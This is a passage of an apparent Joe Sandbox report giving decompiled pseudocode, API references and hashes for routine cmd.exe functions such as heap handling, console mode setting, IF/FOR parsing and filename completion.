                                    				if(_t15 == 0xffffffff) {
                                    					_t7 = GetLastError();
                                    					 *0x1213cf0 = _t7;
                                    					if(_t7 == 0x6e) {
                                    						 *0x1213cf0 = 2;
                                    					}
                                    					_t17 = 0xffffffff;
                                    				} else {
                                    					__imp___open_osfhandle(_t15, 8);
                                    					_t17 = _t6;
                                    					if(_t17 == 0xffffffff) {
                                    						CloseHandle(_t15);
                                    					}
                                    				}
                                    				return _t17;
                                    			}










                                    APIs
                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 011D43D5
                                    • _open_osfhandle.MSVCRT ref: 011D43E9
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011D4401
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E838D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                    • String ID:
                                    • API String ID: 22757656-0
                                    • Opcode ID: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                    • Instruction ID: c46d2590374e1c5e5ed94f8303d3313607c23a97add8386e0a967e63a5608983
                                    • Opcode Fuzzy Hash: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                    • Instruction Fuzzy Hash: DB01F232804220ABD728ABACB80DB5EBBA8AB51B39F110319F974E31C0DFB008458791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E011E3B2C(void* __ecx) {
                                    				void _t4;
                                    				void* _t9;
                                    				void* _t12;
                                    
                                    				_t9 = __ecx;
                                    				_t12 = HeapAlloc(GetProcessHeap(), 8, 4);
                                    				if(_t12 == 0) {
                                    					L4:
                                    					return 0;
                                    				} else {
                                    					_t4 = E011E3AAE();
                                    					 *_t12 = _t4;
                                    					if(_t4 == 0) {
                                    						RtlFreeHeap(GetProcessHeap(), 0, _t12);
                                    						_push(0);
                                    						_push(0x233a);
                                    						E011DC5A2(_t9);
                                    						goto L4;
                                    					} else {
                                    						return _t12;
                                    					}
                                    				}
                                    			}







                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,011E3DBB), ref: 011EDFEA
                                    • RtlFreeHeap.NTDLL(00000000,?,011E3DBB), ref: 011EDFF1
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                    • String ID:
                                    • API String ID: 197374240-0
                                    • Opcode ID: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                    • Instruction ID: 4c487068d14a3d6b0647b84abe2f30d3305ad894d05d26a4459f6eacb17d4a89
                                    • Opcode Fuzzy Hash: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                    • Instruction Fuzzy Hash: 1BE09232A4461267EE3476F97C1DF862E949B94B39F114448FB85CA0C4DE20C4C08BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E011F9897() {
                                    				signed int _v8;
                                    				void* _t4;
                                    				int _t5;
                                    				void* _t7;
                                    				void* _t9;
                                    
                                    				_t4 =  &_v8;
                                    				__imp___get_osfhandle(_t4, _t9);
                                    				_t5 = GetConsoleMode(_t4, 1);
                                    				if(_t5 != 0) {
                                    					_t7 = _v8 & 0xfffffffb;
                                    					_v8 = _t7;
                                    					__imp___get_osfhandle(_t7);
                                    					return SetConsoleMode(_t7, 1);
                                    				}
                                    				return _t5;
                                    			}









                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F98A3
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,011F3811,?,?,00000001,?), ref: 011F98AB
                                    • _get_osfhandle.MSVCRT ref: 011F98C1
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F3811,?,?,00000001,?), ref: 011F98C9
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID:
                                    • API String ID: 1606018815-0
                                    • Opcode ID: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                    • Instruction ID: dad0fbfef5491f2ff70b8b154ce74b5d15a43aeff037ec27626b183b96b7690e
                                    • Opcode Fuzzy Hash: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                    • Instruction Fuzzy Hash: 1BE01A72900609EBEF20DBA5E81EBAA7B6CEB00325F100956F915C61C1DE71DA809B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E011E4C00() {
                                    				void* _t1;
                                    				void* _t2;
                                    				intOrPtr _t4;
                                    
                                    				_t4 =  *0x120387c;
                                    				_t1 =  *0x1203878;
                                    				 *0x1203880 = _t4;
                                    				 *0x1203884 = _t1;
                                    				__imp___get_osfhandle(_t4);
                                    				_t2 = SetConsoleMode(_t1, 1);
                                    				__imp___get_osfhandle( *0x1203884);
                                    				return SetConsoleMode(_t2, 0);
                                    			}







                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E4C19
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C21
                                    • _get_osfhandle.MSVCRT ref: 011E4C2F
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C37
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID:
                                    • API String ID: 1606018815-0
                                    • Opcode ID: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                    • Instruction ID: ec6dbe24701a0c3c265431f4d6d29991e6dcf2e7dd235b3d323c8d355a4eef70
                                    • Opcode Fuzzy Hash: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                    • Instruction Fuzzy Hash: 03E0BDB2A00201EFEF2ADBA0F81EB547BB5F718305B001A9AF1118318ADBB1A580DB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011DACD5(void** __ecx) {
                                    				void* _t6;
                                    
                                    				_t6 = __ecx;
                                    				RtlFreeHeap(GetProcessHeap(), 0,  *__ecx);
                                    				return RtlFreeHeap(GetProcessHeap(), 0, _t6);
                                    			}





                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,011DACAB), ref: 011DACDE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACE5
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACEE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACF5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: ea90221ba5e5c74c1bed722ef868257a90c0bdc25c0d243a2a47a77c8d4fc69d
                                    • Instruction ID: 316ab2fa5e4eda9d2893ef8daea3b0ef5cd291242f6a99c940100309ea334011
                                    • Opcode Fuzzy Hash: ea90221ba5e5c74c1bed722ef868257a90c0bdc25c0d243a2a47a77c8d4fc69d
                                    • Instruction Fuzzy Hash: 46D09232804110ABDE607BA1B81DBC63A28EB59226F110449FA4582048CEB088C08B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E011D9429(void* __ebx, signed short* __ecx, void* __edi) {
                                    				intOrPtr _v8;
                                    				signed int _t19;
                                    				intOrPtr _t20;
                                    				void* _t21;
                                    				void* _t22;
                                    				signed int _t23;
                                    				signed int _t26;
                                    				void* _t28;
                                    				signed int _t34;
                                    				signed int _t35;
                                    				char* _t37;
                                    				signed int _t38;
                                    				void* _t40;
                                    				signed int _t43;
                                    				signed int _t45;
                                    				signed int _t47;
                                    				intOrPtr* _t51;
                                    				signed int _t55;
                                    				void* _t56;
                                    				signed int _t61;
                                    				signed short* _t70;
                                    				signed int _t71;
                                    				signed int _t76;
                                    				signed int _t77;
                                    				void* _t78;
                                    				void* _t79;
                                    				signed int _t82;
                                    				signed int _t84;
                                    				void* _t86;
                                    				signed int _t87;
                                    				signed int _t89;
                                    
                                    				_push(__ecx);
                                    				_t89 = __ecx;
                                    				if(__ecx == 0) {
                                    					L17:
                                    					_t19 = 1;
                                    					L12:
                                    					return _t19;
                                    				}
                                    				_t20 = E011E00B0(0xffce);
                                    				_v8 = _t20;
                                    				if(_t20 == 0) {
                                    					goto L17;
                                    				}
                                    				_push(__ebx);
                                    				_t21 = 0x5e;
                                    				_t22 = E011DD7D4(__ecx, _t21);
                                    				_t45 = 0;
                                    				if(_t22 != 0) {
                                    					_t51 = __ecx;
                                    					_t70 =  &(__ecx[1]);
                                    					do {
                                    						_t23 =  *_t51;
                                    						_t51 = _t51 + 2;
                                    						__eflags = _t23;
                                    					} while (_t23 != 0);
                                    					_t84 = E011E00B0(2 + (_t51 - _t70 >> 1) * 4);
                                    					__eflags = _t84;
                                    					if(_t84 == 0) {
                                    						L51:
                                    						_t19 = 1;
                                    						L11:
                                    						goto L12;
                                    					}
                                    					_t26 =  *__ecx & 0x0000ffff;
                                    					_t55 = _t84;
                                    					__eflags = _t26;
                                    					if(_t26 == 0) {
                                    						L28:
                                    						_t71 = _t84;
                                    						__eflags = 0;
                                    						 *_t55 = 0;
                                    						_t11 = _t71 + 2; // 0x2
                                    						_t56 = _t11;
                                    						do {
                                    							_t28 =  *_t71;
                                    							_t71 = _t71 + 2;
                                    							__eflags = _t28 - _t45;
                                    						} while (_t28 != _t45);
                                    						_t89 = E011E0100(_t84, 2 + (_t71 - _t56 >> 1) * 2);
                                    						__eflags = _t89;
                                    						if(_t89 == 0) {
                                    							goto L51;
                                    						}
                                    						goto L3;
                                    					}
                                    					_t82 = _t26;
                                    					_t47 = 0x5e;
                                    					do {
                                    						 *_t55 = _t82;
                                    						_t89 = _t89 + 2;
                                    						_t55 = _t55 + 2;
                                    						__eflags = _t82 - _t47;
                                    						if(_t82 == _t47) {
                                    							 *_t55 = _t47;
                                    							_t55 = _t55 + 2;
                                    							__eflags = _t55;
                                    						}
                                    						_t43 =  *_t89 & 0x0000ffff;
                                    						_t82 = _t43;
                                    						__eflags = _t43;
                                    					} while (_t43 != 0);
                                    					_t45 = 0;
                                    					__eflags = 0;
                                    					goto L28;
                                    				}
                                    				L3:
                                    				 *0x11fd538 = 1;
                                    				_t86 = E011DEEF0(1, _t89,  *0x1213cd8);
                                    				 *0x11fd538 = _t45;
                                    				if(_t86 == 1) {
                                    					_t87 = E011DDF40(_t89);
                                    					__eflags = _t87;
                                    					if(_t87 == 0) {
                                    						goto L51;
                                    					}
                                    					__imp___wcsupr(_t87);
                                    					_t61 = L" IF";
                                    					_t34 = _t87;
                                    					while(1) {
                                    						_t76 =  *_t34;
                                    						__eflags = _t76 -  *_t61;
                                    						if(_t76 !=  *_t61) {
                                    							break;
                                    						}
                                    						__eflags = _t76;
                                    						if(_t76 == 0) {
                                    							L38:
                                    							_t35 = _t45;
                                    							L40:
                                    							__eflags = _t35;
                                    							if(_t35 == 0) {
                                    								L49:
                                    								E011DC5A2(_t61, 0x234a, 1, _t89);
                                    								goto L51;
                                    							}
                                    							_t37 = L" FOR";
                                    							while(1) {
                                    								_t61 =  *_t87;
                                    								__eflags = _t61 -  *_t37;
                                    								if(_t61 !=  *_t37) {
                                    									break;
                                    								}
                                    								__eflags = _t61;
                                    								if(_t61 == 0) {
                                    									L48:
                                    									__eflags = _t45;
                                    									if(_t45 != 0) {
                                    										goto L51;
                                    									}
                                    									goto L49;
                                    								}
                                    								_t61 =  *((intOrPtr*)(_t87 + 2));
                                    								__eflags = _t61 - _t37[2];
                                    								if(_t61 != _t37[2]) {
                                    									break;
                                    								}
                                    								_t87 = _t87 + 4;
                                    								_t37 =  &(_t37[4]);
                                    								__eflags = _t61;
                                    								if(_t61 != 0) {
                                    									continue;
                                    								}
                                    								goto L48;
                                    							}
                                    							asm("sbb ebx, ebx");
                                    							_t45 = _t45 | 0x00000001;
                                    							__eflags = _t45;
                                    							goto L48;
                                    						}
                                    						_t77 =  *((intOrPtr*)(_t34 + 2));
                                    						__eflags = _t77 -  *((intOrPtr*)(_t61 + 2));
                                    						if(_t77 !=  *((intOrPtr*)(_t61 + 2))) {
                                    							break;
                                    						}
                                    						_t34 = _t34 + 4;
                                    						_t61 = _t61 + 4;
                                    						__eflags = _t77;
                                    						if(_t77 != 0) {
                                    							continue;
                                    						}
                                    						goto L38;
                                    					}
                                    					asm("sbb eax, eax");
                                    					_t35 = _t34 | 0x00000001;
                                    					__eflags = _t35;
                                    					goto L40;
                                    				}
                                    				if(_t86 == 0xffffffff) {
                                    					_t19 = 0;
                                    					goto L11;
                                    				}
                                    				if( *0x1213cc9 == 0 ||  *((short*)( *((intOrPtr*)(_t86 + 0x38)))) != 0x3a) {
                                    					_t78 = 0x2a;
                                    					_t38 = E011DD7D4( *((intOrPtr*)(_t86 + 0x38)), _t78);
                                    					__eflags = _t38;
                                    					if(_t38 != 0) {
                                    						L16:
                                    						_t19 = E011E07C0(_t45, _t86);
                                    						goto L11;
                                    					}
                                    					_t79 = 0x3f;
                                    					__eflags = E011DD7D4( *((intOrPtr*)(_t86 + 0x38)), _t79);
                                    					if(__eflags != 0) {
                                    						goto L16;
                                    					}
                                    					_t91 = _v8;
                                    					_t40 = E011E10B0(_t86, _v8, __eflags, 0x7fe7);
                                    					__eflags = _t40 - 2;
                                    					if(_t40 == 2) {
                                    						goto L9;
                                    					}
                                    					goto L16;
                                    				} else {
                                    					if( *0x1213cc4 == 0) {
                                    						_push(_t45);
                                    						_push(0x400023aa);
                                    						E011DC5A2(1);
                                    						goto L51;
                                    					}
                                    					_t91 = _v8;
                                    					L9:
                                    					_t19 = E011E2ABE(_t86, _t91, 0x7fe7, 1);
                                    					if(_t19 == 0) {
                                    						_t19 =  *0x120b8b0;
                                    					}
                                    					goto L11;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                      • Part of subcall function 011DEEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                      • Part of subcall function 011DEEF0: RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                      • Part of subcall function 011DEEF0: _setjmp3.MSVCRT ref: 011DEFA5
                                    • _wcsupr.MSVCRT ref: 011F0A16
                                      • Part of subcall function 011E2ABE: memset.MSVCRT ref: 011E2B59
                                      • Part of subcall function 011E2ABE: ??_V@YAXPAX@Z.MSVCRT ref: 011E2C13
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                    • String ID: FOR$ IF
                                    • API String ID: 3818062306-2924197646
                                    • Opcode ID: 7d4da49165f7043b59d530ac4db86cddf4e1734a70d836e0899047e3eca2637b
                                    • Instruction ID: bdd056f49abe3a42dbb47cc429709a94b2f7332799ef172122c85a4215c72833
                                    • Opcode Fuzzy Hash: 7d4da49165f7043b59d530ac4db86cddf4e1734a70d836e0899047e3eca2637b
                                    • Instruction Fuzzy Hash: 5051383570020386EB3EAB6C981477B6293EF9861CB55412DEB068B296FF71D985C381
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 98%
                                    			E011FB2BF(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                    				signed int _t68;
                                    				signed int _t70;
                                    				int _t73;
                                    				signed int _t78;
                                    				signed int _t79;
                                    				intOrPtr _t82;
                                    				signed int _t88;
                                    				void* _t93;
                                    				intOrPtr _t96;
                                    				signed int _t99;
                                    				signed int _t100;
                                    				intOrPtr* _t101;
                                    				short _t105;
                                    				long _t108;
                                    				signed int _t110;
                                    				signed int _t115;
                                    				signed int _t119;
                                    				signed int _t121;
                                    				signed int _t124;
                                    				void* _t125;
                                    				intOrPtr _t126;
                                    				void* _t128;
                                    
                                    				_push(0x30);
                                    				_push(0x11fc160);
                                    				E011E7678(__ebx, __edi, __esi);
                                    				 *((intOrPtr*)(_t128 - 0x3c)) = __edx;
                                    				 *((intOrPtr*)(_t128 - 0x24)) = __ecx;
                                    				_t68 = E011E00B0(0x4000);
                                    				_t93 = _t68;
                                    				 *(_t128 - 0x40) = _t93;
                                    				if(_t93 == 0) {
                                    					L46:
                                    					return E011E76BD(_t68);
                                    				}
                                    				_t121 = 0;
                                    				 *((intOrPtr*)(_t128 - 4)) = 0;
                                    				if( *((intOrPtr*)(_t128 + 0x14)) != 0) {
                                    					L4:
                                    					_t115 = _t121;
                                    					 *(_t128 - 0x2c) = _t115;
                                    					_t119 = _t121;
                                    					 *(_t128 - 0x28) = _t119;
                                    					_t70 = _t68 | 0xffffffff;
                                    					__eflags = _t70;
                                    					 *(_t128 - 0x1c) = _t70;
                                    					 *(_t128 - 0x30) = _t70;
                                    					 *(_t128 - 0x20) = _t121;
                                    					 *(_t128 - 0x34) = 0x2a;
                                    					while(1) {
                                    						 *(_t128 - 0x38) = _t121;
                                    						_t96 =  *((intOrPtr*)(_t128 + 8));
                                    						__eflags = _t121 - _t96;
                                    						if(_t121 >= _t96) {
                                    							break;
                                    						}
                                    						_t108 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
                                    						__eflags = _t108 - 0x2f;
                                    						if(_t108 != 0x2f) {
                                    							__eflags = _t108 - 0x22;
                                    							if(_t108 != 0x22) {
                                    								__eflags = _t115;
                                    								if(_t115 != 0) {
                                    									L17:
                                    									_t110 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
                                    									__eflags = _t110 - 0x3a;
                                    									if(_t110 == 0x3a) {
                                    										L22:
                                    										_t35 = _t121 + 1; // 0x1
                                    										_t70 = _t35;
                                    										 *(_t128 - 0x1c) = _t70;
                                    										 *(_t128 - 0x30) = _t70;
                                    										L23:
                                    										__eflags = 0;
                                    										 *(_t128 - 0x20) = 0;
                                    										L24:
                                    										_t121 = _t121 + 1;
                                    										continue;
                                    									}
                                    									__eflags = _t110 - 0x5c;
                                    									if(_t110 == 0x5c) {
                                    										goto L22;
                                    									}
                                    									__eflags = _t110 -  *(_t128 - 0x34);
                                    									if(_t110 ==  *(_t128 - 0x34)) {
                                    										L21:
                                    										 *(_t128 - 0x20) = 1;
                                    										goto L24;
                                    									}
                                    									__eflags = _t110 - 0x3f;
                                    									if(_t110 != 0x3f) {
                                    										goto L24;
                                    									}
                                    									goto L21;
                                    								}
                                    								_t88 = wcschr(L" &()[]{}^=;!%\'+,`~", _t108);
                                    								_t115 =  *(_t128 - 0x2c);
                                    								__eflags = _t88;
                                    								if(_t88 == 0) {
                                    									_t70 =  *(_t128 - 0x1c);
                                    									goto L17;
                                    								}
                                    								_t25 = _t121 + 1; // 0x1
                                    								_t119 = _t25;
                                    								 *(_t128 - 0x28) = _t119;
                                    								__eflags = 0;
                                    								 *(_t128 - 0x20) = 0;
                                    								L15:
                                    								_t70 =  *(_t128 - 0x1c);
                                    								goto L24;
                                    							}
                                    							__eflags = _t115;
                                    							if(_t115 == 0) {
                                    								_t119 = _t121;
                                    								 *(_t128 - 0x28) = _t119;
                                    							}
                                    							__eflags = _t115;
                                    							_t115 = 0 | _t115 == 0x00000000;
                                    							 *(_t128 - 0x2c) = _t115;
                                    							goto L15;
                                    						}
                                    						_t18 = _t121 + 1; // 0x1
                                    						_t119 = _t18;
                                    						 *(_t128 - 0x28) = _t119;
                                    						goto L23;
                                    					}
                                    					__eflags = _t70 - 0xffffffff;
                                    					if(_t70 == 0xffffffff) {
                                    						L27:
                                    						_t122 = _t119;
                                    						 *(_t128 - 0x30) = _t119;
                                    						L29:
                                    						_t73 = _t96 - _t119 + _t96 - _t119;
                                    						 *(_t128 - 0x34) = _t73;
                                    						memcpy(_t93,  *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t73);
                                    						_t78 =  *((intOrPtr*)(_t128 + 8)) - _t119;
                                    						__eflags =  *(_t128 - 0x20);
                                    						if(__eflags != 0) {
                                    							__eflags = 0;
                                    							 *((short*)(_t93 + _t78 * 2)) = 0;
                                    						} else {
                                    							_t105 = 0x2a;
                                    							 *((short*)(_t93 + _t78 * 2)) = _t105;
                                    							 *((short*)( *(_t128 - 0x34) + _t93 + 2)) = 0;
                                    						}
                                    						_t124 =  *(_t128 + 0x10);
                                    						_t79 = E011FAEE5(_t93, __eflags, _t124, _t122 - _t119);
                                    						 *0x11fd580 = _t79;
                                    						_t99 = _t79;
                                    						 *0x11fd57c = _t99;
                                    						 *0x11fd574 = _t119;
                                    						 *0x11fd578 = _t124;
                                    						_t121 = 0;
                                    						__eflags = 0;
                                    						L33:
                                    						if(_t79 == 0) {
                                    							L45:
                                    							 *((intOrPtr*)(_t128 - 4)) = 0xfffffffe;
                                    							E011FB4D5(_t93);
                                    							_t68 =  *0x11fd580; // 0x0
                                    							goto L46;
                                    						}
                                    						if( *((intOrPtr*)(_t128 + 0xc)) == 0) {
                                    							_t100 = _t99 - 1;
                                    							__eflags = _t100;
                                    							 *0x11fd57c = _t100;
                                    							if(_t100 >= 0) {
                                    								L40:
                                    								_t116 =  *((intOrPtr*)( *0x121853c + _t100 * 4));
                                    								_t101 =  *((intOrPtr*)( *0x121853c + _t100 * 4));
                                    								_t125 = _t101 + 2;
                                    								do {
                                    									_t82 =  *_t101;
                                    									_t101 = _t101 + 2;
                                    								} while (_t82 !=  *((intOrPtr*)(_t128 - 4)));
                                    								_t126 =  *((intOrPtr*)(_t128 - 0x3c));
                                    								if((_t101 - _t125 >> 1) + _t119 < _t126) {
                                    									__eflags = _t126 - _t119;
                                    									E011E1040( *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t126 - _t119, _t116);
                                    								} else {
                                    									 *0x11fd580 = 0;
                                    								}
                                    								goto L45;
                                    							}
                                    							_t56 = _t79 - 1; // -1
                                    							_t100 = _t56;
                                    							L39:
                                    							 *0x11fd57c = _t100;
                                    							goto L40;
                                    						}
                                    						_t100 = _t99 + 1;
                                    						 *0x11fd57c = _t100;
                                    						if(_t100 < _t79) {
                                    							goto L40;
                                    						}
                                    						_t100 = _t121;
                                    						goto L39;
                                    					}
                                    					__eflags = _t70 - _t119;
                                    					if(_t70 >= _t119) {
                                    						_t122 =  *(_t128 - 0x1c);
                                    						goto L29;
                                    					}
                                    					goto L27;
                                    				}
                                    				_t68 =  *0x11fd578; // 0x0
                                    				if(_t68 !=  *(_t128 + 0x10)) {
                                    					goto L4;
                                    				}
                                    				_t79 =  *0x11fd580; // 0x0
                                    				_t99 =  *0x11fd57c; // 0x0
                                    				_t119 =  *0x11fd574; // 0x0
                                    				goto L33;
                                    			}
                                    0x011fb46e
                                    0x011fb479
                                    0x011fb47e
                                    0x011fb481
                                    0x011fb483
                                    0x011fb486
                                    0x011fb486
                                    0x011fb489
                                    0x011fb48c
                                    0x011fb499
                                    0x011fb49e
                                    0x011fb4aa
                                    0x011fb4b4
                                    0x011fb4a0
                                    0x011fb4a2
                                    0x011fb4a2
                                    0x00000000
                                    0x011fb49e
                                    0x011fb470
                                    0x011fb470
                                    0x011fb473
                                    0x011fb473
                                    0x00000000
                                    0x011fb473
                                    0x011fb456
                                    0x011fb457
                                    0x011fb45f
                                    0x00000000
                                    0x00000000
                                    0x011fb461
                                    0x00000000
                                    0x011fb461
                                    0x011fb3d7
                                    0x011fb3d9
                                    0x011fb3e2
                                    0x00000000
                                    0x011fb3e2
                                    0x00000000
                                    0x011fb3d9
                                    0x011fb2f2
                                    0x011fb2fa
                                    0x00000000
                                    0x00000000
                                    0x011fb2fc
                                    0x011fb301
                                    0x011fb307
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • wcschr.MSVCRT ref: 011FB377
                                    • memcpy.MSVCRT ref: 011FB3F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcessmemcpywcschr
                                    • String ID: &()[]{}^=;!%'+,`~
                                    • API String ID: 3241892172-381716982
                                    • Opcode ID: 8b0a23908fb75cdb795a4fa811c3c8bef449d78a517bc53c237b2e3ca4f08200
                                    • Instruction ID: a4968a7c3d17b64c3cab38cdff0da4d815c3be77eff07a2c7b1b08b394f56e1c
                                    • Opcode Fuzzy Hash: 8b0a23908fb75cdb795a4fa811c3c8bef449d78a517bc53c237b2e3ca4f08200
                                    • Instruction Fuzzy Hash: 6C614DB0E08219CBCF2CCFA9E5945BDBBF1FB48314B25412EEA16E7254D7709941CB58
                                    Uniqueness

